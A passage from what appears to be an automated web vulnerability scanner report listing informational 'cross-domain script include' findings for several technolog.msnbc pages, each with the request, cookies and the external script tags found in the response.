</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.334. http://technolog.msnbc.redacted/apple

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /apple

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /apple HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:32:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130442

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.335. http://technolog.msnbc.redacted/apps

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /apps

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /apps HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:46:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 156567

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.336. http://technolog.msnbc.redacted/at

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /at

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /at HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:51:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 108659

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
<div id="vine-inlineCode__5764127" class="inlineCode photo_align_right" data-contentid="5764127"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.337. http://technolog.msnbc.redacted/blackberry

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /blackberry

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blackberry HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:44:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120951

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.338. http://technolog.msnbc.redacted/ces-2011

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /ces-2011

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ces-2011 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:39:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117278

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div id="vine-inlineCode__5786170" class="inlineCode photo_align_right" data-contentid="5786170"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div id="vine-inlineCode__5780422" class="inlineCode photo_align_right" data-contentid="5780422"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.339. http://technolog.msnbc.redacted/citizen-gamer

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /citizen-gamer

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /citizen-gamer HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:33:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 153901

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
